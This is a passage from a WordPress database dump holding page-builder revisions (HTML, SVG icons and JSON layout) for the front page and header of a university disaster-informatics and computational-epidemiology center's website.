640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c16\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 style-local-20-c17 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n        <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c20\">\n                <!---->\n                <!---->\n                <h5 class=\"\">Impact assessment</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-04-29 09:59:22','2022-04-29 13:59:22','',20,'https://gsudice.dataconn.net/?p=1302',0,'revision','',0),(1303,1,'2022-04-29 09:59:22','2022-04-29 13:59:22','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":678,\"type\":\"header\",\"props\":{\"text\":\"our mission\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/about\\/our-mission\\/\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h29\",\"partialId\":22,\"styleRef\":677,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h31\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h33\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h37\",\"parentId\":\"22-h36\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h36\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h38\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h35\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-04-29 09:59:22','2022-04-29 13:59:22','',23,'https://gsudice.dataconn.net/?p=1303',0,'revision','',0),(1304,1,'2022-04-29 09:59:22','2022-04-29 13:59:22','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path 